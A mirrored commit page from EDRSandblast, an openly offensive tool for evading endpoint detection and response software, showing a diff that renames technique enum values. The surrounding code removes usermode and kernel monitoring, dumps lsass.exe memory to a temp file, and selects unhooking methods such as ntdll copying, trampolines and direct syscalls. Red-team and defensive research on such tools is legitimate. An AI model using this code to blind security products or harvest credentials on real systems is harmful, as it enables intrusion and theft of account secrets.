mirror of
https://github.com/wavestone-cdt/EDRSandblast.git
synced 2026-06-10 17:31:23 +00:00
Changed enum names in API
This commit is contained in:
Maxime Meignan
@@ -23,9 +23,9 @@ int main()
|
|||||||
if (status = EDRSB_Init(&ctx, &cfg) != EDRSB_SUCCESS) {
|
if (status = EDRSB_Init(&ctx, &cfg) != EDRSB_SUCCESS) {
|
||||||
printf("EDRSB_Init: %u", status);
|
printf("EDRSB_Init: %u", status);
|
||||||
}
|
}
|
||||||
Usermode_RemoveAllMonitoring(&ctx, Find_and_use_existing_trampoline);
|
Usermode_RemoveAllMonitoring(&ctx, EDRSB_UMTECH_Find_and_use_existing_trampoline);
|
||||||
Krnlmode_RemoveAllMonitoring(&ctx);
|
Krnlmode_RemoveAllMonitoring(&ctx);
|
||||||
Action_DumpProcessByName(&ctx, L"lsass.exe", L"C:\\no_scan\\tmp\\tmp.tmp", Find_and_use_existing_trampoline);
|
Action_DumpProcessByName(&ctx, L"lsass.exe", L"C:\\temp\\tmp.tmp", EDRSB_UMTECH_Find_and_use_existing_trampoline);
|
||||||
Krnlmode_RestoreAllMonitoring(&ctx);
|
Krnlmode_RestoreAllMonitoring(&ctx);
|
||||||
EDRSB_CleanUp(&ctx);
|
EDRSB_CleanUp(&ctx);
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -519,11 +519,11 @@ VOID Usermode_EnumAllMonitoring(_Inout_ EDRSB_CONTEXT* ctx) {
|
|||||||
|
|
||||||
VOID Usermode_RemoveAllMonitoring(_Inout_ EDRSB_CONTEXT* ctx, EDRSB_USERMODE_TECHNIQUE technique) {
|
VOID Usermode_RemoveAllMonitoring(_Inout_ EDRSB_CONTEXT* ctx, EDRSB_USERMODE_TECHNIQUE technique) {
|
||||||
UNHOOK_METHOD map_methods[5] = { 0 }; //maps EDRSB_USERMODE_TECHNIQUE enum with UNHOOK_METHOD enum
|
UNHOOK_METHOD map_methods[5] = { 0 }; //maps EDRSB_USERMODE_TECHNIQUE enum with UNHOOK_METHOD enum
|
||||||
map_methods[Unhook_with_ntdll_NtProtectVirtualMemory] = UNHOOK_WITH_NTPROTECTVIRTUALMEMORY;
|
map_methods[EDRSB_UMTECH_Unhook_with_ntdll_NtProtectVirtualMemory] = UNHOOK_WITH_NTPROTECTVIRTUALMEMORY;
|
||||||
map_methods[Copy_ntdll_and_load] = UNHOOK_WITH_DUPLICATE_NTPROTECTVIRTUALMEMORY;
|
map_methods[EDRSB_UMTECH_Copy_ntdll_and_load] = UNHOOK_WITH_DUPLICATE_NTPROTECTVIRTUALMEMORY;
|
||||||
map_methods[Allocate_trampoline] = UNHOOK_WITH_INHOUSE_NTPROTECTVIRTUALMEMORY_TRAMPOLINE;
|
map_methods[EDRSB_UMTECH_Allocate_trampoline] = UNHOOK_WITH_INHOUSE_NTPROTECTVIRTUALMEMORY_TRAMPOLINE;
|
||||||
map_methods[Find_and_use_existing_trampoline] = UNHOOK_WITH_EDR_NTPROTECTVIRTUALMEMORY_TRAMPOLINE;
|
map_methods[EDRSB_UMTECH_Find_and_use_existing_trampoline] = UNHOOK_WITH_EDR_NTPROTECTVIRTUALMEMORY_TRAMPOLINE;
|
||||||
map_methods[Use_direct_syscall] = UNHOOK_WITH_DIRECT_SYSCALL;
|
map_methods[EDRSB_UMTECH_Use_direct_syscall] = UNHOOK_WITH_DIRECT_SYSCALL;
|
||||||
UNHOOK_METHOD unhook_method = map_methods[technique];
|
UNHOOK_METHOD unhook_method = map_methods[technique];
|
||||||
|
|
||||||
if (!ctx->foundUserlandHooks) {
|
if (!ctx->foundUserlandHooks) {
|
||||||
@@ -552,17 +552,17 @@ EDRSB_STATUS _GetSafeNtFunctionbyUnhookingWithNtProtectVirtualMemory(_In_ LPCSTR
|
|||||||
EDRSB_STATUS Usermode_GetSafeNtFunc(_Inout_ EDRSB_CONTEXT* ctx, _In_ LPCSTR functionName, _Outptr_result_maybenull_ PVOID* function, EDRSB_USERMODE_TECHNIQUE technique) {
|
EDRSB_STATUS Usermode_GetSafeNtFunc(_Inout_ EDRSB_CONTEXT* ctx, _In_ LPCSTR functionName, _Outptr_result_maybenull_ PVOID* function, EDRSB_USERMODE_TECHNIQUE technique) {
|
||||||
WCHAR tempDLLFilePath[MAX_PATH] = { 0 };
|
WCHAR tempDLLFilePath[MAX_PATH] = { 0 };
|
||||||
switch (technique) {
|
switch (technique) {
|
||||||
case Copy_ntdll_and_load:
|
case EDRSB_UMTECH_Copy_ntdll_and_load:
|
||||||
GetTempPathW(MAX_PATH, tempDLLFilePath);
|
GetTempPathW(MAX_PATH, tempDLLFilePath);
|
||||||
PathCchCombine(tempDLLFilePath, _countof(tempDLLFilePath), tempDLLFilePath, L"ntdlol.txt");//TODO : make it configurable
|
PathCchCombine(tempDLLFilePath, _countof(tempDLLFilePath), tempDLLFilePath, L"ntdlol.txt");//TODO : make it configurable
|
||||||
return _Usermode_GetSafeNtFunction_with_ntdll_copy(ctx, tempDLLFilePath, functionName, function);
|
return _Usermode_GetSafeNtFunction_with_ntdll_copy(ctx, tempDLLFilePath, functionName, function);
|
||||||
case Allocate_trampoline:
|
case EDRSB_UMTECH_Allocate_trampoline:
|
||||||
return _GetSafeNtFunctionUsingTrampoline(FALSE, functionName, function);
|
return _GetSafeNtFunctionUsingTrampoline(FALSE, functionName, function);
|
||||||
case Find_and_use_existing_trampoline:
|
case EDRSB_UMTECH_Find_and_use_existing_trampoline:
|
||||||
return _GetSafeNtFunctionUsingTrampoline(TRUE, functionName, function);
|
return _GetSafeNtFunctionUsingTrampoline(TRUE, functionName, function);
|
||||||
case Unhook_with_ntdll_NtProtectVirtualMemory:
|
case EDRSB_UMTECH_Unhook_with_ntdll_NtProtectVirtualMemory:
|
||||||
return _GetSafeNtFunctionbyUnhookingWithNtProtectVirtualMemory(functionName, function);
|
return _GetSafeNtFunctionbyUnhookingWithNtProtectVirtualMemory(functionName, function);
|
||||||
case Use_direct_syscall:
|
case EDRSB_UMTECH_Use_direct_syscall:
|
||||||
*function = CreateSyscallStubWithVirtuallAlloc(functionName);
|
*function = CreateSyscallStubWithVirtuallAlloc(functionName);
|
||||||
if (*function) {
|
if (*function) {
|
||||||
return EDRSB_SUCCESS;
|
return EDRSB_SUCCESS;
|
||||||
|
|||||||
@@ -32,11 +32,11 @@ typedef struct EDRSB_BYPASS_MODE_t {
|
|||||||
} EDRSB_BYPASS_MODE;
|
} EDRSB_BYPASS_MODE;
|
||||||
|
|
||||||
typedef enum EDRSB_USERMODE_TECHNIQUE_e {
|
typedef enum EDRSB_USERMODE_TECHNIQUE_e {
|
||||||
Unhook_with_ntdll_NtProtectVirtualMemory,
|
EDRSB_UMTECH_Unhook_with_ntdll_NtProtectVirtualMemory,
|
||||||
Copy_ntdll_and_load,
|
EDRSB_UMTECH_Copy_ntdll_and_load,
|
||||||
Allocate_trampoline,
|
EDRSB_UMTECH_Allocate_trampoline,
|
||||||
Find_and_use_existing_trampoline,
|
EDRSB_UMTECH_Find_and_use_existing_trampoline,
|
||||||
Use_direct_syscall,
|
EDRSB_UMTECH_Use_direct_syscall,
|
||||||
} EDRSB_USERMODE_TECHNIQUE;
|
} EDRSB_USERMODE_TECHNIQUE;
|
||||||
|
|
||||||
// TODO: update values.
|
// TODO: update values.
|
||||||
|
|||||||
Reference in New Issue
Block a user